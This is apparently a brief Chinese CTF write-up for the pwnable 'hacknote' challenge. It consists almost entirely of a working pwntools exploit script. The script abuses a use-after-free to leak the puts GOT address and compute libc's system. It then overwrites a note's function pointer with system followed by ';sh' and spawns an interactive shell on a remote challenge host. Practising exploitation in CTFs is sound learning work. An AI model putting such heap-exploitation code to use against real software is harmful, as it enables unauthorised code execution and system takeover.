pwnable_hacknote 5/100

uaf漏洞利用

sh  “；”间隔执行命令

exp:

from pwn import *
from LibcSearcher import * 

local_file  = './hacknote'
# local_libc  = '/lib/x86_64-linux-gnu/libc-2.23.so'
# remote_libc = './libc-2.23.so'
 
 
select = 1

if select == 0:
    p = process(local_file)
    # libc = ELF("local_libc")
else:
    p = remote('node4.buuoj.cn',28214)
    libc = ELF("./32libc-2.23.so")

e = ELF(local_file)

context.log_level = 'debug'
context.arch = "i386"
context.os = 'linux'

se      = lambda data               :p.send(data) 
sa      = lambda delim,data         :p.sendafter(delim, data)
sl      = lambda data               :p.sendline(data)
sla     = lambda delim,data         :p.sendlineafter(delim, data)
sea     = lambda delim,data         :p.sendafter(delim, data)
rc      = lambda numb=4096          :p.recv(numb)
rl      = lambda                    :p.recvline()
ru      = lambda delims			    :p.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, b'\x00'))
uu64    = lambda data               :u64(data.ljust(8, b'\x00'))
info_addr = lambda tag, addr        :p.info(tag + ': {:#x}'.format(addr))

def dbg(cmd=''):
     gdb.attach(p,cmd)

def add(size,content):
    ru(b"Your choice :")
    se(b'1')
    ru(b":")
    se(str(size).encode())
    ru(b":")
    se(content)

def delete(index):
    ru(b"Your choice :")
    se(b'2')
    ru(b":")
    se(str(index).encode())
    ru(b"Success")

def show(index):
    ru(b"Your choice :")
    se(b'3')
    ru(b':')
    se(str(index).encode())

bss_addr = 0x804A050

add(0x10,b'/bin/sh\x00\x00')#0
add(0x10,b'bbbb')#1
delete(1)
delete(0)
add(0x8,p32(0x804862b) + p32(e.got['puts']))#2
show(1)
addr = u32(p.recv(4))
success(hex(addr))
# libc = LibcSearcher('puts',addr)
libc_base = addr - libc.sym['puts']
success("base: "+ hex(libc_base))
sys = libc_base + libc.sym['system']
delete(2)

add(0x8,p32(sys) + b";sh\x00")
show(1)

p.interactive()